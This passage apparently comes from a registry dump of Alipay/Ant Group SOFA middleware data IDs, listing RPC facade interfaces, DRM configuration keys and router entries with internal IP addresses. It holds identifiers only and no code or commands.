EFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.AdvertisementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.datadomain.DataDomainMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.biz.shared.ISapinesRuleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.OperateTraceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.168.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.chargefront.core.service.config.ChargeFrontCommonDrm.hotAccounts,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.60.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.wallet.core.service.WalletRobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.228.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.zqArchiveUpdateIpSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardsales.common.service.facade.PcardSalesParamsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.129.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_EBPP_DEDUCT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcore.spi.RpcSpi:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTSCALECALC#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEMOCK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleShopCategoryValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade.TemplateInstanceQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zarcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_7300_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ctuofflineplt.common.facade.service.UctEventSampleRatioService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.IndirectMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestStartUpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AuthScopeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.workorder.facade.WorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcreditmng.common.service.facade.ZmCreditMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.adaptor.yunyou.YunyouChangeServiceCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","not-exists:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csbizcenter.facade.admin.polymer.SearchLabelAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.product.ProductOnSaleNotifyRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthCorpAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.inner.ShareInfoGzService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.DomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.ctudb.CtuProcessRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.redeem.service.RedeemCashService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.appstore.common.service.facade.promotion.PromotionTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acccenter.common.service.facade.open.product.ServiceProductQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappcommon.common.service.facade.baas.TfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.oto.api.OtotransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskinsightlib.common.service.facade.event.RiskEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:minitrans@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcardcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ICTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.isession.common.service.facade.enterprise.EnterpriseRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopSendCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.sh.common.service.facade.AntcloudTimeTriggerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodcore.service.api.product.ProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchArQueryFacade2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvoice.facade.invoice.InvoicePoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.cityPutConsistGroupNameStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.kwlib:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.runtimedatasrcmng.common.service.facade.api.source.doom.DoomInvokeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.facade.api.TicketTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.attribute.AttributeTemplateMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.201.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.51.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskConfigMgmtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingOpenApiNotifyTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:financingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.InstComponentMetaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:govdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.cache.facade.TagCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.mng.api.TagQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.graycore.changesdk.client.ChangeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finance.goldetfprod.common.service.facade.api.GoldTradeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.95.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agds.common.service.facade.creditobtain.CreditObtainMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.eco.EcoFetchTinyappInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rpc.common.service.facade.TripleHessianInterface:1.0:abcd@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zscale.api.MyBankDecisionServiceFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.taskScheduleGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.backmanagement.TagManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:minialipayweb-sff-antvip-test-one@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PAYDECISION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCustomBusServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCRISKSCAN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pcreditamount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zmmng_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.54.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.prototype.ActivityQueryConsumerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.encourage.service.EncourageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.arks.drm.DRMLoadBalanceResource.adaptiveLbRatioStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.interlog.InternalOpLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.retention.RetentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.CommonVoucherParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.LockPaasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.manage.campaign.service.CampManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.capability.common.facade.CapabilityTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.event.EventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeOrderEarlyRedeemdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.InstanceCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.MetaDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.gatewaysign.service.GatewaySignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.InsuranceAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.UserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.richman.RichmanCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ShopSyncOrderBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.signcenter.service.read.FinanceValidateRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.superapi.common.core.client.opnecore.OpenIdAdaptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pricemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FININSIGHTMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.core.service.publisher.MsgBrokerPublisher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mydds.dassmetaDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:apimg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetdecision.common.service.facade.api.OrgControlQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditmng.common.service.SolutionTemplateActionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.config.api.DepositbackApiStrategyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.weather.LatestWeatherServiceInRzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.intercepts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.replayssummary.ReplaysSummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.emcooperate.common.service.facade.JbServiceStarPushSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTDSR#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.syncClearLoanArStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.biz.service.impl.rpc.MobileLifeAckCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.mpaas.SidTokenValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DCEPLUBAN#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.152.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.common.service.facade.api.InspectionScenarioInitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudinc.cloudincDatasource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.ServicePackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.251.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.itransferprod.service.facade.api.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationBizEventFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.AgdsCreditCenterTwoPhaseCreditOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.apshopcenter.common.service.facade.ContentBlockQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.genericmerchant.facade.ShopOperatorRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountCorrectTransValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscTablesetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgChannelMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","data3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.53.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.config.drm.DrmMinitransGeneralSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.alert.analysis.HaCommonAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincompose.common.service.facade.AtomExchangeCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.JraftFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.api.TairSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.JobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.openhome.MessageNotificationFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.endpoint.hbase.ConsistencyRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirecenter.biz.ams.service.PayInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.disableProduct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileacauth.service.trustlogin.facade.TrustLoginService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.productpkg.drm.impl.PortfolioCoreDrmMangerImpl.useTairFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantcore.common.service.facade.tenant.api.TenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.PrimaryMeterDataPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxTaskDataReader:1.0:echoagent@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.emergency.EmcManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.facade.service.visual.VisualModelManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.api.DataOwnerAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@csrobotmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.tradefront.service.refund.api.RefundAfterTradeCompletedRecoveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:icdpcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSIOP#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECURITYOPS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmcore.common.service.facade.api.MerchantLifeInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.ExamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.robot.api.RobotDialogDesicionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.catalog.CatalogQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanyRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:csplatform#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsop.common.service.facade.api.KbsopCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.MaterialManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:inslifeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antprivacy.inspect.manager.ArchiveCheckManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.PublicMsgTemplateAuditFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.30.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","anteduprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dchainconfigcenter.facade.file.api.FilesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MALGO#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.delayDiagnose,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.tag.SpTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:payflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.48.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.sp.business.BusinessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.base.msq.MsgService:1.0:antflow.msq.service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.QuotationRankingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.ClusterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_I